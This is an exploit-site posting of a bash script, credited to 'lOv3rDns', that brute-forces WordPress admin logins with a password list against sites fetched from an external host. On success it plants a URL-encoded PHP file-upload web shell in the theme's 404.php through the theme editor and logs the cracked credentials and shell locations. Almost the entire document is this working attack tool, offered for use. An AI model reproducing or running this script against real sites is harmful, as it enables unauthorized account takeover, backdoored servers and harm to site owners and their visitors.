facebook facebook twitter rss

Wordpress Brute Force + Remote Upload Shell [ Bash Shell ]

Author: lOv3rDns , Published: 18-06-2015
#!/bin/bash
# Thanks script ( UzunDz ) To Get All Website Wordpress In Server
# source code get website wordpress there ( http://pastebin.com/ExVu6pzY ) && Change Line : 39
# run the script on windows ! Download GIT => [ http://git-scm.com/download/win ]

function check_delete()
{
if [ -f "Boo" -a -f "cookies.txt" -a -f "x3Urls.txt" ]
then
`rm Boo`
`rm cookies.txt`
`rm x3Urls.txt`
fi
}

if [ $1 -a $2 -a $3 ]
then
echo "[+]--------------------------------------------------------[+]"
echo "[+] Coder By : Lov3rDns [+]"
echo "[+] Title : Wordpress Brute Force + Remote Upload Shell [+]"
echo "[+] Homepage : http://pastebin.com/u/dnsx3 [+]"
echo "[+] 4U : Mr.Dm4r - xSecurity - Shark Hidden [+]"
echo "[+]--------------------------------------------------------[+]"
else
echo "
Usage : bash $0 Username ip pass.txt
"
exit
fi

echo "

Welcome $( whoami )"
echo "

Downloading Targets ...

"

`curl --cookie $CookieD --cookie-jar \
$CookieD -o x3Urls.txt http://ostadz.com/ye/tmp/get.php?ip=$2\&dork=wordpress`

check_delete
function UploadShell() # try upload shell file 404.php
{
gettoken="$listweb/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen"
shell=$(curl --cookie $CookieD --cookie-jar \
$CookieD silent $gettoken | grep 'name="_wpnonce"' | cut -d'"' -f8)
if [ "$shell" != "" ]
then
`curl --cookie $CookieD --cookie-jar \
$CookieD POST \
--data "_wpnonce=$shell&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3F%0D%0A%24cwd+%3D+getcwd%28%29%3B%0D%0AEcho+%27%3Ccenter%3E%0D%0A%0D%0A%3Cform+method%3D%22post%22+target%3D%22_self%22+enctype%3D%22multipart%2Fform-data%22%3E%0D%0A%0D%0A%3Cinput+type%3D%22file%22+size%3D%2220%22+name%3D%22uploads%22+%2F%3E%0D%0A%3Cinput+type%3D%22submit%22+value%3D%22upload%22+%2F%3E%0D%0A%3C%2Fform%3E%0D%0A%3C%2Fcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%0D%0A%3C%2Ftable%3E%3Cbr%3E%27%3B%0D%0Aif+%28%21empty+%28%24_FILES%5B%27uploads%27%5D%29%29%0D%0A%7B%0D%0A++++move_uploaded_file%28%24_FILES%5B%27uploads%27%5D%5B%27tmp_name%27%5D%2C%24_FILES%5B%27uploads%27%5D%5B%27name%27%5D%29%3B%0D%0A++++Echo+%22%3Cscript%3Ealert%28%27upload+Done%27%29%3B%0D%0A%0D%0A%09+%3C%2Fscript%3E%3Cb%3EUploaded+%21%21%21%3C%2Fb%3E%3Cbr%3Ename+%3A+%22.%24_FILES%5B%27uploads%27%5D%5B%27name%27%5D.%22%3Cbr%3Esize+%3A+%22.%24_FILES%5B%27uploads%27%5D%5B%27size%27%5D.%22%3Cbr%3Etype+%3A+%22.%24_FILES%5B%27uploads%27%5D%5B%27type%27%5D%3B%0D%0A%7D%0D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&submit=%D8%AA%D8%AD%D8%AF%D9%8A%D8%AB+%D8%A7%D9%84%D9%85%D9%84%D9%81" \
$listweb/wp-admin/theme-editor.php`

echo "

[ + ] You Have Logged :)
website : $listweb
Username : $1
pass : $listpass

Upload Shell => $listweb/wp-content/themes/twentythirteen/404.php

"
echo "[ + ] You Have Logged :) => Website : $listweb => Username : $1 => Password : $listpass " >> result.txt
echo "Upload Shell => $listweb/wp-content/themes/twentythirteen/404.php" >> shell.txt

else
echo "

Sorry .. Can't Uploaded Shell :(

"
fi
}

# Start ..

CookieD=cookies.txt
webs=`cat x3Urls.txt`
pass=`cat $3`
for listweb in $webs
do
for listpass in $pass
do
`curl --cookie $CookieD --cookie-jar \
$CookieD POST \
--data "log=$1&pwd=$listpass&wp-submit=Log+In&redirect_to=./wp-admin/&testcookie=1" \
$listweb/wp-login.php -v`

cat cookies.txt>Boo

#checksX3=$(cat test.html | grep "upload.php")
scan=$(cat Boo | grep "#HttpOnly")
scanurlwordpress="$listweb/wp-login.php"
resultscan=$(curl --cookie $CookieD --cookie-jar \
$CookieD silent $scanurlwordpress | grep "lostpassword")
if [ "$scan" != "" -a "$resultscan" != "" ]
then
#timeout

UploadShell
check_delete
break
else
echo "

[ - ] Sorry .. Try again :
Website : $listweb
Username : $1
Password : $listpass

"
fi
done
done
exit

Like us on Facebook :